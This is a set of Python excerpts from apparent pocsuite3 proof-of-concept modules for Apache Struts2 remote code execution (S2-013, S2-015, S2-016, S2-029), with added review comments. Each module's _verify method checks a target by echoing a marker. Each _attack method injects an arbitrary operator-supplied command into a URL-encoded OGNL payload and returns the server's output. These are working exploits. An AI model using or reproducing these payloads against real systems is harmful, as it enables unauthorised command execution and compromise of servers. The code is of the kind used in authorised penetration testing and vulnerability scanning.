        payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
            'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
            '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
            'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
            '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
            '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
            'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
            'ing(%23d))%2C%23out.close()%7D'
        payload = payload.replace("RECOMMAND", cmd)
        # Plain concatenation: self.url is assumed to carry no query string already.
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            # Errors are swallowed; indistinguishable from "not vulnerable".
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Run the 'command' option through the S2-013 payload and return stdout.

        Same payload as _verify with RECOMMAND replaced by the option value;
        on a 200 response the whole body is stored in result['Stdout'].

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        # NOTE(review): the option value is substituted verbatim, without encoding.
        payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
                  'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
                  '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
                  'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
                  '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
                  '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
                  'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
                  'ing(%23d))%2C%23out.close()%7D'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for Struts2 S2-015 by echoing a fixed marker through the action name.

        The OGNL expression is embedded in the requested action path, so the
        server answers with a 404 whose body carries the expression result. A
        finding is recorded when the status is 404 and the body contains
        VuLnEcHoPoCSuCCeSS.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        # In vulmap this payload is hard-coded to run `id`; the result is shown on the 404 page.
        payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
            r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
            r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
            r"utStream())}.action"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            # Do not test the response object's truthiness here: a 404 makes it falsy.
            if response.status_code == 404 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            # Errors are swallowed; indistinguishable from "not vulnerable".
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Run the 'command' option through the S2-015 action-name payload.

        On a 404 response the text between the Message markers of the error
        page is extracted with re.findall, URL-unquoted, and stored as
        result['Stdout'] (note: the str() of the whole list, not a joined string).

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        # In vulmap this payload is hard-coded to run `id`; the result is shown on the 404 page.
        payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
                  r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
                  r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
                  r"utStream())}.action"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response.status_code == 404:  # Do not test the response object's truthiness here: a 404 makes it falsy.
                # NOTE(review): decode('utf-8') raises on non-UTF-8 bodies and is
                # then swallowed by the generic handler below.
                res = parse.unquote(str(re.findall(r"  <  p> < b>Message < /b>(.*?) < /p>", response.content.decode('utf-8'))))
                result['Stdout'] = res
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


# Register the PoC class with the framework so it can be loaded by name.
register_poc(DemoPOC)

0 Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for Struts2 S2-016 by echoing a fixed marker through the redirect: prefix.

        Appends the URL-encoded OGNL payload (RECOMMAND replaced by an echo of
        VuLnEcHoPoCSuCCeSS) to self.url and records a finding on a 200 response
        whose body contains the marker.

        Returns:
            Whatever self.parse_output() produces for the result dict.
        """

        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        # Raw strings: the \\s and \\A sequences are meant for the server-side
        # Java regex, not for Python.
        payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
            r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
            r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
            r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
            r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
            r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
            r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
            r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
            r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
            r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
            r"(),%23resp.getWriter().close()}"
        payload = payload.replace("RECOMMAND", cmd)
        # Plain concatenation: self.url is assumed to carry no query string already.
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            # Errors are swallowed; indistinguishable from "not vulnerable".
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Send the operator-supplied ``command`` option in the payload and return the response body.

        Builds the same URL-encoded payload as the ``_verify`` example above, but substitutes
        ``self.get_option("command")`` for the placeholder.  On HTTP 200 the entire response text
        is stored under ``result['Stdout']``; no marker check is performed, so a 200 with an
        unrelated page body is reported as output too.  Returns ``self.parse_output(result)``.
        """
        # Static request headers sent with the single request.
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        # Operator-supplied command string from the PoC's ``command`` option.
        cmd = self.get_option("command")
        # Same payload as the ``_verify`` example on this page; the ``?redirect:`` prefix is a
        # useful access-log signature for defenders.
        payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
                  r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
                  r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
                  r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
                  r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
                  r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
                  r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
                  r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
                  r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
                  r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
                  r"(),%23resp.getWriter().close()}"
        # The command is substituted verbatim for the RECOMMAND placeholder.
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            # NOTE(review): no explicit ``timeout`` is passed, so the ReadTimeout branch below can
            # only fire if the pocsuite3 requests wrapper applies a default — TODO confirm.
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                # Whole body is reported; there is no check that it is actually command output.
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            # NOTE(review): all other errors are swallowed silently; ``e`` is never used.
            pass

        return self.parse_output(result)


# Registers the DemoPOC class with the framework (``register_poc`` is presumably imported from
# pocsuite3.api); the class definition itself is above, outside this excerpt.
register_poc(DemoPOC)

0 Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Probe ``self.url`` with a fixed echo payload and report it only if the marker is reflected.

        The method appends a static, URL-encoded payload to ``self.url`` and issues one GET.  When
        the response is HTTP 200 and the marker string is present in the body,
        ``result['VerifyInfo']['URL']`` is set to the full probe URL; otherwise ``result`` stays
        empty.  Returns ``self.parse_output(result)``.  Network errors never propagate.
        """

        # Static request headers sent with the single probe request.
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        # The probe command only echoes a fixed marker.  For defenders, this literal and the
        # ``_memberAccess`` tokens in the payload below are reliable signatures to alert on.
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
            r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
            r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
            r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
            r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
            r"()))"
        # RECOMMAND is the placeholder the echo command is substituted into.
        payload = payload.replace("RECOMMAND", cmd)
        # The payload is appended directly to ``self.url`` with no separator of its own.
        url = self.url + payload
        # Must match the string echoed by ``cmd`` above; the check below is a plain substring test.
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            # NOTE(review): no explicit ``timeout`` is passed, so the ReadTimeout branch below can
            # only fire if the pocsuite3 requests wrapper applies a default — TODO confirm.
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            # NOTE(review): every other failure is swallowed without logging, so it is
            # indistinguishable from "not vulnerable"; ``e`` is never used.
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        """Send the operator-supplied ``command`` option in the payload and return the response body.

        Builds the same URL-encoded payload as the ``_verify`` example above, but substitutes
        ``self.get_option("command")`` for the placeholder.  On HTTP 200 the entire response text
        is stored under ``result['Stdout']``; no marker check is performed, so a 200 with an
        unrelated page body is reported as output too.  Returns ``self.parse_output(result)``.
        """
        # Static request headers sent with the single request.
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        # Operator-supplied command string from the PoC's ``command`` option.
        cmd = self.get_option("command")
        # Same payload as the ``_verify`` example on this page; the ``_memberAccess`` tokens are a
        # useful access-log signature for defenders.
        payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
                  r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
                  r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
                  r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
                  r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
                  r"()))"
        # The command is substituted verbatim for the RECOMMAND placeholder.
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            # NOTE(review): no explicit ``timeout`` is passed, so the ReadTimeout branch below can
            # only fire if the pocsuite3 requests wrapper applies a default — TODO confirm.
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                # Whole body is reported; there is no check that it is actually command output.
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            # NOTE(review): all other errors are swallowed silently; ``e`` is never used.
            pass

        return self.parse_output(result)


# Registers the DemoPOC class with the framework (``register_poc`` is presumably imported from
# pocsuite3.api); the class definition itself is above, outside this excerpt.
register_poc(DemoPOC)
